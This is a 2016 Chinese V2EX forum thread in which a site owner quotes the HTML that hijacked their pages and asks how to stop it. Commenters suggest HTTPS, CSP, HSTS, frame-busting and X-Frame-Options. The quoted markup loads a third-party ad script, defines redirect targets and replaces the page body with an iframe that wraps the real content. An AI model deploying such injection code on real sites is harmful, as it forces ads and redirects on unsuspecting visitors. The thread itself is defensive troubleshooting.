V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
ab
V2EX  ›  问与答

网站被劫持,头部加入弹窗广告,body 被清空,只留一个 iframe,框入我的内容

  •  
  •   ab · 2016-04-30 01:26:14 +08:00 · 2719 次点击
    这是一个创建于 3122 天前的主题,其中的信息可能已经有所发展或是发生改变。
    <!DOCTYPE html>
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <script src="http://j.qiqiww.com/i.php?z=10295"></script>
    <script>url = {a: "http://120.27.28.39/hh/kd580102.html", m: "http://www.123.com/"};
    var _xus = "Y1zOwBolM1s9dBFpzkiUM3gO";
    var _xai = "0";</script>
    <script>function goURLa(a) {
    var desturl = (a === 2 ? url.a : url.m);
    if (desturl.slice(desturl.length - 1) == "/") desturl = desturl.slice(0, desturl.length - 1);
    return "<html></head><script>document.location.replace(\"" + desturl + "\");<\/script><\/html>"
    }
    ;</script>
    </head>
    <body style='margin:0px;overflow-x:hidden;overflow-y:hidden;'>
    <iframe src='JavaScript:parent.goURLa(1)' scrolling=auto width='100%' height='100%' frameborder='no' onload=''
    style='position:fixed;'></iframe>
    </body>
    </html>

    源码变成上面那样.表面看,内容就还是我的内容,但是加了弹窗了

    有什么技术变成防止吗?
    10 条回复    2016-04-30 21:59:35 +08:00
    m939594960
        1
    m939594960  
       2016-04-30 01:30:28 +08:00
    https
    Slienc7
        2
    Slienc7  
       2016-04-30 02:05:33 +08:00 via Android
    投诉
    投诉
    投诉



    HTTPS 从操作上来说最简单了;
    如果能插脚步那就
    Slienc7
        3
    Slienc7  
       2016-04-30 02:08:36 +08:00 via Android
    接:如果能插自己的脚本那就清空 body ,全部动态加载内容 ;
    上 CSP ,可以干掉站外脚本;
    不买华为。

    其实除了 HTTPS 其他可操作性或效用都不大 。
    lyragosa
        4
    lyragosa  
       2016-04-30 02:23:00 +08:00
    HTTPS 啊,不然你以为为啥百度淘宝都加入全站 https 了
    Jaylee
        5
    Jaylee  
       2016-04-30 09:52:15 +08:00
    教你一个猥琐的方法

    des
        6
    des  
       2016-04-30 10:42:07 +08:00 via Android
    @Jaylee 这个不行的

    好像可以 try 一下 window===window.top
    然后 catch 里面做你想做的
    另外上 https 也是个方法
    还有记得好像有个 htto 头也可以禁止 iframe ,不过要求比较高的浏览器版本
    des
        7
    des  
       2016-04-30 10:45:09 +08:00 via Android
    话又说回来就算你上 https ,并且开了 hsts 也没用,因为默认第一次还是会走 http
    ab
        8
    ab  
    OP
       2016-04-30 18:51:16 +08:00
    @des 试过没用吗? 看着挺有道理.

    目前上 https 因一些原因不太现实啊.而且你说的有理,第一次是还是 http

    X-Frame-Options 也试用,没有用,禁止 iframe 了一样被劫,只是显示空白页面了,窗还是照弹
    ab
        9
    ab  
    OP
       2016-04-30 18:52:02 +08:00
    @Jaylee 的方法试过没用吗? 看着挺有道理. @des
    des
        10
    des  
       2016-04-30 21:59:35 +08:00 via Android
    @ab 你去看看爆栈是怎么实现的吧
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2908 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 13:38 · PVG 21:38 · LAX 05:38 · JFK 08:38
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.